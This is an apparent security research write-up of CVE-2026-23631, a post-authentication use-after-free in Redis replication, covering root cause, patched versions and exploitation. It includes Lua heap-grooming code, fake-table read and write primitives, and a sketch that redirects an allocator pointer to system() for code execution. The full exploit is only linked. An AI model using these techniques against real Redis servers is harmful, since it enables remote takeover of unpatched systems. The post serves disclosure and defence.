ZeroDay.cloud
Back to Blog
Redis

DarkReplica (CVE-2026-23631): Redis Use-After-Free Leads to Post-Auth RCE

Yoni SherezJun 221 min read

CVE-2026-23631

In December 2025, I participated in the ZeroDay.Cloud 2025 competition in London. I decided to target Redis (post authentication), due to its complexity and large and interesting attack surface. During my research, I found DarkReplica (CVE-2026-23631) — a post-authentication Use-After-Free vulnerability in the replication subsystem of Redis server. The vulnerability involves assigning the target server as an attacker-controlled server's "slave" (using the SLAVEOF command), and then abusing a logic flaw in the synchronization process, which leads to a Use-After-Free (UAF) scenario in the Lua functions engine.

This writeup describes the root cause of the vulnerability, as well as the exploitation journey until achieving Remote Code Execution.

Remediation

Redis patched the bug on May 5, 2026. The fix was shipped across all five maintained release series.

Release seriesAffected versionsFixed version
Redis 7.2.x7.2.0 – 7.2.137.2.14
Redis 7.4.x7.4.0 – 7.4.87.4.9
Redis 8.2.x8.2.0 – 8.2.58.2.6
Redis 8.4.x8.4.0 – 8.4.28.4.3
Redis 8.6.x8.6.0 – 8.6.28.6.3

Background

Redis's Built-In Lua Engine(s)

One of the most promising attack surfaces of Redis is the Lua engine. Redis includes a built-in Lua engine that allows developers to execute atomic functions on the server that can manipulate data. The Lua interpreter itself is a forked Lua 5.1 engine with some modifications made by Redis developers. Of course, Lua code runs in a sandboxed Lua environment in order to prevent remote code execution. In fact, Redis does not contain just one Lua engine, but two separate ones:

The scripting engine (SCRIPT LOAD/EVAL/EVALSHA/…)

The older model. It allows running scripts and storing them on the server, and then calling them again using their SHA1 hash. It also contains "LDB" (SCRIPT DEBUG), which is a Lua debugger implemented by Redis on top of Lua hooks.

127.0.0.1:6379> SCRIPT LOAD "return KEYS[1] .. ' ' .. ARGV[1]"
"406bf0497c622efb466704c62042f34776db84b7"
127.0.0.1:6379> EVALSHA 406bf0497c622efb466704c62042f34776db84b7 1 Hello World
"Hello World"

The functions engine (FUNCTION LOAD/FCALL/…)

The newer model. It allows registering libraries containing functions, which are then callable by name using FCALL. The functions engine has a generic design, and might support other scripting languages in the future. Currently, only Lua 5.1 is supported. Functions are also permanent (stored in RDB/AOF files, and also get synced with other cluster nodes), compared to scripts, which are only stored in memory.

127.0.0.1:6379> FUNCTION LOAD "#!lua name=mylib \n redis.register_function('myfunc', function(keys, argv) return keys[1] .. ' ' .. argv[1] end)"
"mylib"
127.0.0.1:6379> FUNCTION LIST
1) 1) "library_name"
   2) "mylib"
   3) "engine"
   4) "LUA"
   5) "functions"
   6) 1) 1) "name"
         2) "myfunc"
         3) "description"
         4) (nil)
         5) "flags"
         6) (empty array)
127.0.0.1:6379> FCALL myfunc 1 Hello World
"Hello World"
127.0.0.1:6379> FUNCTION FLUSH
OK
127.0.0.1:6379> FUNCTION LIST
(empty array)

For the sake of this writeup, I am going to focus specifically on the functions engine, but remember the scripting engine for later.

Vulnerability Root Cause Analysis

Slow Scripts

When executing arbitrary Lua code, an issue might arise: what if the code has some bug that makes it run for a very long time (or even forever)? Since Redis is a single-threaded server, this would block the server completely and deny service to other users. This is where FUNCTION KILL comes into play. After 5 seconds of executing a function, Redis prints the following log line:

1:S 33 Jul 2025 13:37:13.337 # Slow script detected: still in execution after 5000 milliseconds. You can try killing the script using the FUNCTION KILL command. Script name is: scam.

This Redis command kills the currently executing function. An attentive reader might now ask: "Wait, you said that Redis is single-threaded! So how will it handle the FUNCTION KILL command while it's blocked?". Well, this is why Redis installs a custom Lua hook function before executing the user script:

lua_sethook(lua, luaMaskCountHook, LUA_MASKCOUNT, 100000);

static void luaMaskCountHook(lua_State *lua, lua_Debug *ar) {
    if (scriptInterrupt(rctx) == SCRIPT_KILL) {
        // ...
    }
}

int scriptInterrupt(scriptRunCtx *run_ctx) {
    if (run_ctx->flags & SCRIPT_TIMEDOUT) {
        /* script already timedout
           we just need to process some events and return */
        processEventsWhileBlocked();
        return (run_ctx->flags & SCRIPT_KILLED) ? SCRIPT_KILL : SCRIPT_CONTINUE;
    }
    // ...
}

This hook executes every 100K Lua instructions. It checks if the function has timed out (by default — 5 seconds), and then calls processEventsWhileBlocked(), which handles pending events (for example, I/O events) from the Redis event loop. This is how the server is able to handle other connections while a Lua function is blocking it.

This opens a door to many potential issues. For example: what if someone calls the FUNCTION FLUSH command while a slow function is running? Wouldn't it cause the server to release all Lua functions while one of them is being executed? Fortunately, Redis developers did see that coming:

int processCommand(client *c) {
    // ...

    /* when a busy job is being done (script / module)
     * Only allow a limited number of commands. */
    if (isInsideYieldingLongCommand() && !(c->cmd->flags & CMD_ALLOW_BUSY)) {
        // ...
        rejectCommand(c, shared.slowscripterr);
        // ...
    }

    // ...
}

There are only a few specific commands (including FUNCTION KILL and SCRIPT KILL) that can be executed during a timed-out function execution. When you try to execute a non-whitelisted command, you get the following error back:

(error) BUSY Redis is busy running a script. You can only call FUNCTION KILL or SHUTDOWN NOSAVE.

The Loophole

An interesting fact is that processEventsWhileBlocked() handles not only I/O events from regular clients, but all I/O events. So if the Redis server is a "slave" in the cluster, commands sent from the master server will also be handled! And there, nothing checks if a function is currently executing before performing state-changing operations.

Redis Replication

Redis allows assigning a "master server" to another server (using the SLAVEOF command). The slave server connects to the master and receives updates and full/partial synchronizations, in order to sync the full state of the server. The master can issue a PSYNC/FULLRESYNC with the slave at any given time, and then provide an RDB file (Redis's data serialization and storage format) that the slave will write locally and load.

RDB Structure

RDB is a fairly simple protocol. It contains a list of records, where each has an "opcode" and data in some specific structure according to the opcode. These are the supported RDB record types:

/* Special RDB opcodes (saved/loaded with rdbSaveType/rdbLoadType). */
#define RDB_OPCODE_SLOT_INFO  244   /* Individual slot info, such as slot id and size (cluster mode only). */
#define RDB_OPCODE_FUNCTION2  245   /* function library data */
#define RDB_OPCODE_FUNCTION_PRE_GA   246   /* old function library data for 7.0 rc1 and rc2 */
#define RDB_OPCODE_MODULE_AUX 247   /* Module auxiliary data. */
#define RDB_OPCODE_IDLE       248   /* LRU idle time. */
#define RDB_OPCODE_FREQ       249   /* LFU frequency. */
#define RDB_OPCODE_AUX        250   /* RDB aux field. */
#define RDB_OPCODE_RESIZEDB   251   /* Hash table resize hint. */
#define RDB_OPCODE_EXPIRETIME_MS 252    /* Expire time in milliseconds. */
#define RDB_OPCODE_EXPIRETIME 253       /* Old expire time in seconds. */
#define RDB_OPCODE_SELECTDB   254   /* DB number of the following keys. */
#define RDB_OPCODE_EOF        255   /* End of the RDB file. */

RDB Functions Synchronization

As you might guess, I chose to focus on the RDB_OPCODE_FUNCTION2 opcode. The slave should always sync its functions and libraries with the master. So for each defined Lua "library" in the master, a record with opcode RDB_OPCODE_FUNCTION2 is sent to the slave together with the relevant Lua code. The slave immediately loads it:

} else if (type == RDB_OPCODE_FUNCTION2) {
    sds err = NULL;
    if (rdbFunctionLoad(rdb, rdbver, rdb_loading_ctx->functions_lib_ctx, rdbflags, &err) != C_OK) {
        serverLog(LL_WARNING,"Failed loading library, %s", err);
        sdsfree(err);
        goto eoferr;
    }
    continue;
}

Under normal circumstances, when performing a FULLRESYNC, emptyData() will be called to empty the server before loading the new RDB. It will then call functionsLibCtxClearCurrent(), which will free the current functions context and related objects, and initialize a new one:

void functionsLibCtxClearCurrent(int async) {
    if (async) {
        functionsLibCtx *old_l_ctx = curr_functions_lib_ctx;
        dict *old_engines = engines;
        freeFunctionsAsync(old_l_ctx, old_engines);
    } else {
        functionsLibCtxFree(curr_functions_lib_ctx);
        dictRelease(engines); // <-------
    }
    functionsInit();
}

/* Free the given functions ctx */
void functionsLibCtxFree(functionsLibCtx *functions_lib_ctx) {
    functionsLibCtxClear(functions_lib_ctx);
    dictRelease(functions_lib_ctx->functions);
    dictRelease(functions_lib_ctx->libraries);
    dictRelease(functions_lib_ctx->engines_stats);
    zfree(functions_lib_ctx);
}

The dictRelease(engines) call will free() the current lua_State object (the global Lua interpreter object)! Then, the new functions from the RDB will be loaded into the newly initialized functions context. When loading an RDB_OPCODE_FUNCTION2, rdb_loading_ctx->functions_lib_ctx (the server functions context) is not the global context, but a new one. At the end of the RDB load, the global context will be replaced with the new one.

After returning from processEventsWhileBlocked(), our Lua function will continue running, but now with a completely freed Lua engine.

Triggering the Vulnerability

So the plan is as follows:

Sure enough, we get a beautiful crash dump:

1:S 33 Jul 2025 13:37:13.337 * Before turning into a replica, using my own master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
1:S 33 Jul 2025 13:37:13.337 * Connecting to MASTER 172.18.0.1:8474
1:S 33 Jul 2025 13:37:13.337 * MASTER <-> REPLICA sync started
...
1:S 33 Jul 2025 13:37:13.337 # Slow script detected: still in execution after 5000 milliseconds.
...
=== REDIS BUG REPORT START: Cut & paste starting from here ===
1:S 33 Jul 2025 13:37:13.337 # Redis 8.4.0 crashed by signal: 11, si_code: 128
1:S 33 Jul 2025 13:37:13.337 # Accessing address: (nil)
1:S 33 Jul 2025 13:37:13.337 # Crashed running the instruction at: 0x648a03093f37

Exploitation

The primitive we achieved is executing a Lua function, while it, its state, its "stack", and every object that is related to it are all freed! While this is a very strong primitive, it also has a very chaotic nature. The lua_State is a fairly complex object with references to many other objects (of various sizes). A very strong heap control is necessary in order to allocate all of these objects in the exact right way for the program not to accidentally crash at some point.

Furthermore, there are objects that we just cannot fake without requiring some more primitives. For example, every Lua operation that involves allocating memory calls lua_State->l_G->frealloc(), which is basically a custom malloc() callback. We still do not have an ASLR leak, so we cannot write a valid pointer to executable memory there.

The Lua VM

Before we dive into the exploitation itself, we have to first introduce some core concepts of the Lua VM.

Lua has its own bytecode format that runs in a register-based VM. It also has a stack that contains called functions, arguments to functions, local variables, and the "registers" themselves (which are just dedicated positions on the function stack frame). Every Lua bytecode instruction manipulates some variables on the stack. For example:

Lua 5.1 also features an incremental GC implementation, which we won't dive into, as it's not directly relevant to our exploit.

Primitives

Returning to our exploitation strategy; besides the UAF primitive, we also have some small memory primitives that can help us later.

Heap Address Leakage

Fortunately for us, Lua's default tostring() function returns pointers for values which are not strings or numbers!

tostring({})
-- table: 0x634b5724c340

This is, in fact, a pointer to the GCObject structure, which is a union that can represent all existing Lua object types.

typedef struct lua_TValue {
    Value value;
    int tt;  // type
} TValue;

typedef union {
    GCObject *gc;
    void *p;
    lua_Number n;  // for number values
    int b;
} Value;

union GCObject {
    GCheader gch;  // GC header
    union TString ts;  // for string values
    union Udata u;  // for userdata values
    union Closure cl;  // for function values
    struct Table h;  // for table values
    struct Proto p;  // for function prototypes
    struct UpVal uv;  // for function upvals
    struct lua_State th;  // for "threads" (coroutines)
};

malloc()

We can build a malloc() primitive — the ability to allocate an arbitrary string in memory and know its address.

The tostring() function does not return a pointer for string values. The default allocator for Redis is Jemalloc, and as a result of its tcache implementation (and thanks to Redis being single-threaded), when we free() an object and then malloc() an object of the same size class, we will deterministically get the same address back.

local a = coroutine.create(function() end)  -- Allocates a coroutine
local addr = tostring(a)  -- Saves the address for its lua_State object (size 184)
a = nil  -- Removes the reference to the coroutine object
collectgarbage("collect")  -- Triggers the GC, which will free the lua_State object
a = "AAAAAA..." .. "A"  -- Allocates a string with our payload of size 184 - sizeof(TString) (the string header)
-- Our buffer is now allocated in the same address as the freed coroutine (which we know) + sizeof(TString)

We use CONCAT (..) in order to allocate the string when we need it, otherwise it would just be saved as a function constant at compilation time and wouldn't get allocated again.

Because the functions engine is about to be freed, we use the separate Lua scripting engine (remember?) in order to allocate our objects, and then turn its GC off to prevent it from releasing our objects.

After allocating on top of the vulnerable freed lua_State, this primitive will also allow us to control the whole "tree of objects" (control other objects it references), since we can now write data to the heap at known addresses.

Allocating the Freed Buffers

We need to "spray" the heap in order to allocate on top of the just-freed objects. Redis has a separate Jemalloc arena for Lua scripts, which means only Lua objects can "exploit" our UAF. Fortunately for us, the next thing that happens after freeing the Lua engine is, conveniently, loading our RDB. As explained above, our RDB can contain RDB_OPCODE_FUNCTION2 records which contain Lua function registration code that will get executed immediately. This script is controlled by us and can allocate objects in order to spray the heap and allocate on top of the freed objects we need.

Taking Control Over the Lua VM

So now we have everything we need. Let's allocate on top of the freed lua_State!

Another issue arises: remember what we said about Jemalloc's tcache? The next object that gets allocated right after freeing the old engine's lua_State is the new one. As expected, it deterministically gets allocated on top of the old one. :(

To work around this issue, we can abuse Lua coroutines — Lua's implementation of "threads", which are not really threads, but more like function generators that can be resumed, pause execution in the middle, and yield results.

local co = coroutine.create(function(x)
    for i = 1, x do
        coroutine.yield(i)
    end
end)

local success, a = coroutine.resume(co, 5)
print(a)  -- 1
success, a = coroutine.resume(co)
print(a)  -- 2
-- ...

What's interesting here is that every coroutine is running in its own lua_State. So if we run our slow function (the one that gets freed) inside of a coroutine, after the new engine's lua_State object will malloc() on top of the old one, we will still be able to allocate on top of the coroutine's lua_State and take control of the function's Lua VM.

#!lua name=mylib

redis.register_function("hoax", function()
    co = coroutine.create(function(a)
        -- This function runs in a separate lua_State
        while 1 do end
    end)
    coroutine.resume(co)
end)

Stabilizing the VM

We can now execute arbitrary Lua opcodes in a custom Lua environment with our own fake objects on the stack. We are getting close.

The next issue is that we are very limited in what we can actually do without crashing the program, because of various constraints (e.g., the frealloc() issue explained above). "Stabilizing" the VM will help us a lot. For that, we can use another trick related to Lua coroutines.

Let's build the following Lua stack layout:

[0] LUA_TFUNCTION - coroutine.resume
[1] LUA_TTHREAD   - stage3_co
[2] LUA_TTABLE    - fakeobj1
[3] LUA_TTABLE    - fakeobj2
...

Then, we can execute the following single Lua instruction:

CALL R0 4 1

This will execute coroutine.resume(stage3_co, fakeobj1, fakeobj2). Then, our function will continue execution in the (non-freed) coroutine's lua_State, while receiving our arbitrary fake objects as arguments!

We've just transferred our fake Lua objects from the "broken" Lua engine to another clean Lua engine!

Achieving a Write-What-Where Primitive

Now we can run Lua code in a fully functional environment and build fake objects. So, what objects can we fake? Let's take a look at the "table" (Lua's dictionary type) internal structures:

typedef struct Table {
    CommonHeader;
    lu_byte flags;  /* 1<<p means tagmethod(p) is not present */
    int readonly;
    lu_byte lsizenode;  /* log2 of size of `node' array */
    struct Table *metatable;
    TValue *array;  /* array part */
    Node *node;
    Node *lastfree;  /* any free position is before this position */
    GCObject *gclist;
    int sizearray;  /* size of `array' array */
} Table;

In Lua, the table type is actually usable as both an array and a dictionary. Elements with a number index are stored in the Table->array array, and Table->sizearray represents its size. If we set array to 0x4141414141414141 and sizearray to 1, executing fake_table[1] = 1337 (Note: Lua indexes start at 1) will copy the number's TValue to Table->array[0] — in our case, the controlled address 0x4141414141414141!

typedef struct lua_TValue {
    Value value;
    int tt;  // type
} TValue;

typedef union {
    GCObject *gc;
    void *p;
    lua_Number n;  // for number values
    int b;
} Value;

typedef double lua_Number;

For the Lua number type, TValue->tt == LUA_TNUMBER and TValue->value.n is the actual number (represented as a double).

We can build the following memory layout:

fake_table1:
    array: 0
    sizearray: 1

fake_table2:
    array: &fake_table1->array
    sizearray: 1

Then, execute the write primitive twice:

local function write(addr, val)
    fake_table2[1] = uint64_to_double(addr)  -- Override fake_table1's array pointer
    fake_table1[1] = uint64_to_double(val)
end

Achieving an Arbitrary Read Primitive

Executing local a = fake_table1[1] from Lua code will attempt to read a TValue from a given address and copy it to a local variable. The issue is it will also copy addr+8 (which is an arbitrary value) as the value type. We need the value to be LUA_TNUMBER in order to be able to read it as a number from Lua code.

So… let's fake some more tables!

fake_table3_array:
    - value: 0
      tt: 0
fake_table3:
    array: &fake_table3_array
fake_table4:
    array: &fake_table3->array[0].tt

Instead of assigning to a local variable, we can do fake_table3[1] = fake_table1[1]. This will copy the value we want to read to fake_table3_array->value and some random value to fake_table3_array->tt. Then, we do fake_table4[1] = 3, which will "fix" the type to be LUA_TNUMBER (since fake_table4->array points directly at fake_table3_array->tt). Now, we can just read fake_table3[1] as usual and get the value:

local function read(addr)
    fake_table2[1] = uint64_to_double(addr)  -- Override fake_table1's array pointer
    fake_table3[1] = fake_table1[1]  -- Read the value with a broken type to fake_table3[1]
    fake_table4[1] = uint64_to_double(3)  -- Fix fake_table3[1]'s type to be LUA_TNUMBER
    local val = fake_table3[1]  -- Read val as a double from fake_table3!
    val = double_to_buf(val)  -- Convert it to a buf to get raw data
    return val
end

Achieving Code Execution

Now that we have a Lua function running in a stable VM with memory read/write capability and addresses of Lua heap objects, the path to code execution is quite trivial.

We have endless paths to proceed with. My two favorites are:

We still do not have libc pointers, so we cannot calculate its ASLR offset. The redis-server binary does not contain a plt stub for system(). Instead, we can just:

local os_clock = read(toaddr(os.clock) + offsetof(CClosure, f), true)  -- Read address of a C function in the redis-server binary
local redis_server_base = os_clock - offsets["redis-server"]["os_clock"]
local umask_got = redis_server_base + offsets["redis-server"]["umask@got.plt"]
local umask = read(umask_got, true)
local libc_base = umask - offsets["libc"]["umask"]
local system = libc_base + offsets["libc"]["system"]

local fake_l_G = malloc_184()
write(fake_l_G + offsetof(global_State, frealloc), system)
write(fake_l_G + offsetof(global_State, ud), command_payload_addr)
-- ...some more writes...

local co = coroutine.create(function() end)
local co_addr = toaddr(co)
write(co_addr + offsetof(lua_State, l_G), fake_l_G)
-- ...some more writes...

coroutine.resume(co)  -- Executes system()!

Conclusions

In this writeup, we walked through Redis's Lua engines and replication subsystem, some of the Lua 5.1 engine's internals, the root cause of the DarkReplica vulnerability, and the full exploitation path to achieve Remote Code Execution.

The vulnerability abuses a logic flaw in Redis's replication process, and demonstrates the complexity of achieving "concurrency" in complicated software with a lot of moving parts. The exploit itself also includes some powerful generic Lua VM exploitation primitives and techniques.

DarkReplica was submitted to the ZeroDay.Cloud 2025 competition in London, where it was awarded $30,000.

Redis patched this vulnerability in version 8.6.3. Patch your instance ASAP.

The full exploit code can be found here.

How Wiz Can Help

Wiz customers can use the pre-built query and advisory in the Wiz Threat Center to assess the risk in their environment.

Wiz identifies both internal and publicly exposed Redis instances in your environment affected by CVE-2026-23631, and alerts you to instances that have been misconfigured to allow unauthenticated access or use weak or default passwords.

Timeline